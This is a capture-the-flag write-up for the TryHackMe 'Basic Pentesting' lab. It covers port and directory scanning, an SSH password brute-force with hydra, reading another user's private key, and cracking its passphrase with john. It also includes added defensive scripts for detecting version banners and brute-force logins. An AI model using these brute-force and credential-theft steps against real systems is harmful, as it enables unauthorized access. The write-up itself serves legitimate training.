# Basic Pentesting

Try this challenge in [TryHackMe: **Basic Pentesting**](https://tryhackme.com/r/room/basicpentestingjt)

> In doing this challenge, I learned the following skills and tools:
>
> * **brute forcing** - using <mark style="color:orange;">**hydra**</mark>
> * **hash cracking** - using <mark style="color:orange;">**ssh2john**</mark>, <mark style="color:orange;">**john**</mark>
> * **service enumeration** - using <mark style="color:orange;">**nmap**</mark>, <mark style="color:orange;">**gobuster**</mark>
> * **Linux Enumeration** - using <mark style="color:orange;">**enum4linux**</mark>, <mark style="color:orange;">**linpeas**</mark>

## Web App Testing and Privilege Escalation

### Find the services exposed by the machine

Run <mark style="color:orange;">**nmap**</mark> and save the output in a `basicpentest` directory

{% code lineNumbers="true" %}

```bash
mkdir basicpentest
nmap -sC -sV 10.10.X.X -oN basicpentest/initial
```

{% endcode %}

{% hint style="info" %}
Just change the **`10.10.X.X`** to the IP address assigned to your target machine
{% endhint %}

<figure><img src="/files/VKFQD16YLgaz0smswpqI" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/SOMtgDHyScaxMTgnQLjZ" alt="" width="563"><figcaption></figcaption></figure>

Check it in the browser: **`http://10.10.X.X`**

<figure><img src="/files/INop3kcNsnSaiUA38enJ" alt="" width="563"><figcaption></figcaption></figure>

Try to **`View Page Source`**. There is a note in green there to <mark style="color:green;">**check their dev note section**</mark>.

<figure><img src="/files/sMUT4k7UitTpVJosFOze" alt="" width="563"><figcaption></figcaption></figure>

So let's check if there is a **`/dev`** directory.

<figure><img src="/files/KRhjDoDZ1npUfiBx9ZwG" alt="" width="563"><figcaption></figcaption></figure>

We get **Not Found** responses from both paths, but the error pages disclose the web server software and version, which is worth noting.

{% hint style="info" %}
**Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80**
{% endhint %}
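The banner above comes from two Apache settings, not one: the `Server` header (controlled by `ServerTokens`) and the error-page footer (controlled by `ServerSignature`). The following shell function is an added example, not code from the room or from this write-up: it checks a saved HTTP response for both leaks and names the directive that removes each. The two sample responses are constructed here (modelled on the 404 page, not captured from the target), and the function name `banner_leaks` is my own.

```shell
# Added example (not from the room or the write-up): flag Apache version
# disclosure in a captured HTTP response and name the directive that stops it.
# Input: a file holding the raw response (headers, blank line, body), e.g.
# saved with `curl -si http://<your-host>/does-not-exist > resp.txt`.
banner_leaks() {
    resp="$1"
    # Leak 1: the Server header carries a version string -> ServerTokens Prod
    if grep -qi '^Server: Apache/[0-9]' "$resp"; then
        echo "header: version in Server header -> set 'ServerTokens Prod'"
    fi
    # Leak 2: the error-page footer repeats version, OS and port -> ServerSignature Off
    if grep -q 'Apache/[0-9.]* (.*) Server at .* Port [0-9]*' "$resp"; then
        echo "body: error-page signature -> set 'ServerSignature Off'"
    fi
}

# Constructed sample responses (modelled on the 404 seen above, not captured from it).
LEAKY_RESP="$(mktemp)"; HARDENED_RESP="$(mktemp)"
trap 'rm -f "$LEAKY_RESP" "$HARDENED_RESP"' EXIT
cat >"$LEAKY_RESP" <<'EOF'
HTTP/1.1 404 Not Found
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

<h1>Not Found</h1>
<p>The requested URL /dev was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80</address>
EOF
cat >"$HARDENED_RESP" <<'EOF'
HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1

<h1>Not Found</h1>
<p>The requested URL /dev was not found on this server.</p>
EOF

banner_leaks "$LEAKY_RESP"      # prints two findings
banner_leaks "$HARDENED_RESP"   # prints nothing
```

Hiding the version does not patch anything, but it removes the free fingerprint that tools like nmap's `-sV` otherwise get from every error page; on a host you administer, put `ServerTokens Prod` and `ServerSignature Off` in the Apache configuration and rerun the check against a 404 response.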

### What is the name of the hidden directory on the web server (enter name without /)?

Using <mark style="color:orange;">**gobuster**</mark>, let's try to figure out what directories exist on the web server.

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X
```

{% endcode %}

<figure><img src="/files/HKN2nyk2e0vtntVzEJIh" alt="" width="563"><figcaption></figcaption></figure>

Even without finishing the scan, we get the directory **`/development`**.

When we access the directory, we'll see two text files, **`dev.txt`** and **`j.txt`**. Let's open both.

<figure><img src="/files/MijqQCZvofGxLCDjR80B" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/vX9hfzMoirAO47sgWxBv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VJKWD5RrDk76wiYi2RZ4" alt=""><figcaption></figcaption></figure>

### User brute-forcing to find the username & password

We found users `jan` & `kay` via <mark style="color:orange;">**enum4linux**</mark>

```bash
/usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.log
```

<figure><img src="/files/mzD0f3qm0V4bn56KuBPO" alt="" width="563"><figcaption></figcaption></figure>

Using <mark style="color:orange;">**hydra**</mark> against SSH with the rockyou wordlist, we find jan's password

```bash
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X
```

<figure><img src="/files/YC9nF3yqyaFnUOUV75SU" alt="" width="563"><figcaption></figcaption></figure>
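A hydra run like the one above is noisy on the target: every guess is a `Failed password` line in the SSH server's auth log. The following shell functions are an added example, not code from the room or from this write-up: they count failed password attempts per source address, flag sources over a threshold, and single out the ones whose guessing was followed by an `Accepted` login, which is the case that needs an incident response rather than just a block rule. The log lines are constructed (timestamps, hostname and IPs are made up), and the function names are my own.

```shell
# Added example (not from the room or the write-up): spot SSH password
# brute-forcing like the hydra run above from the server's auth log.
# Input: a syslog-style auth.log; threshold = failed attempts per source IP.

# Print "IP COUNT" for every source with at least THRESHOLD failed passwords.
ssh_bruteforce_sources() {
    log="$1"; threshold="${2:-5}"
    grep 'sshd\[[0-9]*\]: Failed password for' "$log" \
        | sed -n 's/.* from \([0-9.]*\) port .*/\1/p' \
        | sort | uniq -c \
        | awk -v t="$threshold" '$1 >= t { print $2, $1 }'
}

# Of those sources, print the ones that also got an "Accepted" login:
# a guess that succeeded, so the account must be treated as compromised.
compromised_after_bruteforce() {
    log="$1"; threshold="${2:-5}"
    ssh_bruteforce_sources "$log" "$threshold" | while read -r ip _; do
        if grep 'sshd\[[0-9]*\]: Accepted ' "$log" | grep -qF " from $ip port"; then
            echo "$ip"
        fi
    done
}

# Constructed sample log (timestamps, hostname and IPs are made up).
SAMPLE_LOG="$(mktemp)"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
Apr 12 10:01:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 51000 ssh2
Apr 12 10:01:01 target sshd[1202]: Failed password for jan from 10.10.14.5 port 51001 ssh2
Apr 12 10:01:02 target sshd[1203]: Failed password for jan from 10.10.14.5 port 51002 ssh2
Apr 12 10:01:02 target sshd[1204]: Failed password for jan from 10.10.14.5 port 51003 ssh2
Apr 12 10:01:03 target sshd[1205]: Failed password for jan from 10.10.14.5 port 51004 ssh2
Apr 12 10:01:03 target sshd[1206]: Failed password for invalid user admin from 10.10.14.5 port 51005 ssh2
Apr 12 10:01:04 target sshd[1207]: Failed password for jan from 10.10.14.5 port 51006 ssh2
Apr 12 10:01:04 target sshd[1208]: Failed password for jan from 10.10.14.5 port 51007 ssh2
Apr 12 10:01:05 target sshd[1209]: Accepted password for jan from 10.10.14.5 port 51008 ssh2
Apr 12 10:02:30 target sshd[1301]: Failed password for kay from 192.168.1.20 port 40000 ssh2
Apr 12 10:02:35 target sshd[1302]: Accepted publickey for kay from 192.168.1.20 port 40001 ssh2
EOF

ssh_bruteforce_sources "$SAMPLE_LOG" 5        # 10.10.14.5 8
compromised_after_bruteforce "$SAMPLE_LOG" 5  # 10.10.14.5
```

The single failure from `192.168.1.20` followed by a key-based login is what a normal typo looks like and stays below the threshold; eight failures in four seconds from one address followed by an accepted password is the hydra pattern. The durable fix on the server side is to disable password authentication for SSH and require keys, which removes the attack class rather than just rate-limiting it.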

Now that we know jan's credentials, we use them to log in via SSH.

Check folders and see if we can find interesting files

<figure><img src="/files/TVJg2GMfo54FDv1gUJsV" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/jaC8KR04v9LvTmMqAzWf" alt="" width="563"><figcaption></figcaption></figure>

Since most actions led to permission-denied errors, we ran <mark style="color:orange;">**linpeas**</mark> on the machine to check for possible privilege escalation methods.

Copy `linpeas.sh` to the target machine with `scp`, into a world-writable directory such as `/tmp` or `/dev/shm` (the command below uses `/tmp`):

```bash
scp linpeas.sh jan@10.10.X.X:/tmp
```

<figure><img src="/files/FfdIhdt31dzlGoBJaMdJ" alt="" width="563"><figcaption></figcaption></figure>

Check that the linpeas file was transferred successfully

<figure><img src="/files/SLGE41AxPjTD7lCOdIbT" alt="" width="563"><figcaption></figcaption></figure>

Make linpeas executable:

```bash
chmod +x linpeas.sh 
```

Then execute linpeas:

```bash
./linpeas.sh
```

From the linpeas results, we found a private SSH key at `/home/kay/.ssh/id_rsa` that our user jan is allowed to read.

<figure><img src="/files/3YjTj1oFHn7DNRnYNo3c" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/sz4a2ZFD7ApBb7ochwVZ" alt="" width="563"><figcaption></figcaption></figure>

Open the id\_rsa file and copy its contents

```bash
cat /home/kay/.ssh/id_rsa
```

<figure><img src="/files/33rE7gZDw54IFVXHsOKl" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/v5Kmz92zeT4DuiodRbFl" alt="" width="563"><figcaption></figcaption></figure>

On your Kali machine, paste the contents into a file named `kay_id_rsa`

```bash
nano kay_id_rsa
```

<figure><img src="/files/HD1RgjO0vj1K5wHcpFAs" alt="" width="563"><figcaption></figcaption></figure>

Change the permissions of the file so it is readable and writable only by you (ssh refuses to use a private key with looser permissions)

```bash
chmod 600 kay_id_rsa
```

Try logging in to the machine using the user kay's id\_rsa

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

<figure><img src="/files/MQx4ZSWU7ozdwJ2aAF6b" alt="" width="563"><figcaption></figcaption></figure>

We find that a passphrase is needed for this file.

To figure out the passphrase for kay's id\_rsa, we used <mark style="color:orange;">**ssh2john**</mark>, which is part of John the Ripper, to turn the key into a crackable hash

```bash
ssh2john ~/kay_id_rsa
```

<figure><img src="/files/UKS6XOO5IYFIrBFQeoUU" alt="" width="563"><figcaption></figcaption></figure>

We need to save this output in a text file so it can be cracked with <mark style="color:orange;">**john**</mark>

```bash
ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt
```

<figure><img src="/files/FcBi546nHntsmj2L0Yli" alt="" width="563"><figcaption></figcaption></figure>

Using john, we cracked the hash and got the passphrase

<figure><img src="/files/t7Gm1zCP2yTMKDlgzAPq" alt="" width="563"><figcaption></figcaption></figure>

We can now log in using kay’s credentials

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

{% hint style="success" %}
We opened the **pass.bak** file and the password was revealed
{% endhint %}

<figure><img src="/files/zZ9HTGwpIu0m1RsVqj2N" alt=""><figcaption></figcaption></figure>
